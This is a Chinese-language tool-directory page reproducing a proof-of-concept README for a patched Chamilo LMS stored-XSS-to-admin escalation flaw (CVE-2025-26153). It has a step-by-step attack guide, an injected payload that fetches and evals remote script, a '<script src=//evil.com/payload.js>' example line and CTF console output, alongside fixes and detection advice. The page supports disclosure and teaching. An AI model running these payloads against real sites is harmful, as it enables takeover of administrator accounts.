Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CSRF-via-stored-XSS-for-PrivEsc — Chamilo-LMS (v2.0) CVE-2025-26153 | Kitploit
工具/GitHubGitHub/mexeck88/csrf-via-stored-xss-for-privesc
钓鱼工具权限提升漏洞利用Web应用程序漏洞利用渗透测试学习与教育Payload 开发
GitHubmexeck88/csrf-via-stored-xss-for-privesc

CSRF-via-stored-XSS-for-PrivEsc

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Chamilo-LMS (v2.0) CVE-2025-26153

查看仓库网站
57个月前尚未审核

Chamilo LMS (<= v2.0) - 存储型XSS到权限提升POC [CVE-2025-26153]

概述

此存储库包含一个概念验证,演示了Chamilo LMS中一个存储型跨站脚本(XSS)漏洞,该漏洞可利用从普通用户升级到平台管理员实现权限提升。 此漏洞已收录并已修复:https://nvd.nist.gov/vuln/detail/CVE-2025-26153

漏洞详情

CVE信息

  • 应用:Chamilo LMS <= v2.0
  • 漏洞类型:存储型XSS导致权限提升

技术细节

漏洞代码位置:

  1. /public/main/forum/forumqualify.php - 第277行

    root@kitploit:~
    $form->addLabel(get_lang('Thread'), $threadEntity->getTitle());
    
  2. /public/main/forum/viewforum.php - 第369行

    root@kitploit:~
    .$thread->getTitle().'</a>';
    
  3. 还有更多!

根本原因:

  • 论坛主题标题未经适当清理即存储
  • 主题标题在多个位置显示时未进行HTML转义
  • 没有内容安全策略(CSP)阻止XSS执行

分步权限提升指南

第一阶段:数据收集

步骤1:收集目标用户信息

  1. 登录Chamilo LMS
  2. 导航到社交网络 -> 个人数据
  3. 打开user_info并记录以下信息:
    • 用户ID
    • 用户名
    • 名
    • 姓
    • 电子邮件地址

步骤2:生成自定义Payload

  1. 执行payload生成器:
    root@kitploit:~
    python generate_payload.py
    
  2. 输入步骤1中的目标用户ID
  3. 输入您不希望更改的描述信息(或指定新值)
  4. 脚本将生成定制的payload.js文件

步骤3:外部托管Payload

  1. 将生成的payload.js上传到公共托管服务:
    • GitHub Gist(推荐)
    • GitHub Pages
    • 您自己的Web服务器
  2. 记下payload文件的直接URL

第二阶段:XSS注入与执行

步骤4:访问社交群组

  1. 登录Chamilo LMS(可使用任何用户账户)
  2. 导航到社交网络 -> 社交群组

步骤5:加入或创建社交群组

  1. 加入现有社交群组,或
  2. 如有需要,创建新的社交群组

步骤6:部署XSS Payload

  1. 在社交群组中创建新主题
  2. 在主题标题字段中,输入以下XSS payload:
    root@kitploit:~
    eval(x.responseText);x.send()">
    
  3. 将YOUR-HOST-SERVER替换为您实际的主机URL
  4. 提交主题

步骤7:触发权限提升

  1. 等待具有管理员权限的用户查看社交群组
  2. 当管理员查看恶意主题时,XSS payload在后台自动执行
  3. 权限提升并非静默发生——管理员会被重定向到用户列表
  4. 指定的目标用户将被提升为平台管理员,且没有任何可见提示

第三阶段:验证

步骤8:确认权限提升

  1. 以目标用户身份登录
  2. 检查是否已授予管理员权限
  3. 验证对管理功能的访问权限

Payload生成器用法

generate_payload.py脚本允许自定义权限提升攻击:

输入参数:

  • 目标用户ID
  • 新用户名
  • 新密码(可选)
  • 官方代码
  • 电子邮件地址
  • 名、姓、电话(可选)

攻击流程示例

root@kitploit:~
1. 攻击者创建恶意论坛主题
   └── 标题:<script src=//evil.com/payload.js></script>

2. 管理员用户浏览论坛并查看主题
   └── 浏览器加载并执行外部JavaScript

3. Payload创建包含权限提升数据的隐藏表单
   └── 针对特定用户ID提权为管理员

4. 表单通过CSRF攻击自动提交
   └── 自动使用管理员的会话Cookie

5. 目标用户成为平台管理员
   └── 攻击者获得平台完全控制权

缓解策略

即时修复

  1. 输入清理

    root@kitploit:~
    // Before
    $threadEntity->getTitle()
    
    // After  
    htmlspecialchars($threadEntity->getTitle(), ENT_QUOTES, 'UTF-8')
    
  2. 输出编码

    root@kitploit:~
    <!-- Before -->
    {{ thread.title }}
    
    <!-- After -->
    {{ thread.title|escape }}
    
  3. 内容安全策略

    root@kitploit:~
    Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none';
    

长期解决方案

  • 实施全面的输入验证框架
  • 定期安全代码审查
  • 在CI/CD流水线中自动化安全测试
  • 为开发团队提供安全培训

检测与监控

日志分析

监控以下内容:

  • 异常的管理员用户创建/修改
  • 包含HTML/JavaScript的可疑论坛主题标题
  • 从不可信域加载外部脚本

法律免责声明

重要法律声明

此概念验证仅供教育和授权安全测试目的。

  • 仅用于您拥有或获得明确书面许可测试的系统
  • 未经授权访问计算机系统在大多数司法管辖区是违法的
  • 本研究旨在帮助组织改善其安全态势
  • 作者对任何滥用此信息的行为不承担任何责任

研究致谢

发现与分析: US Cyber Combine

测试环境: USCG CTF环境

成功攻击的控制台输出:

root@kitploit:~
XSS Payload loaded successfully!
Target User ID: 9
Current location: http://cve-hunting.ctf.uscybergames.com:8000/resources/usergroups/show/5
Form created with action: http://cve-hunting.ctf.uscybergames.com:8000/main/admin/user_edit.php?user_id=9
Submitting privilege escalation form for user_id 9
Form has 66 fields
Form submission triggered!
Fetch response status: 200
下载工具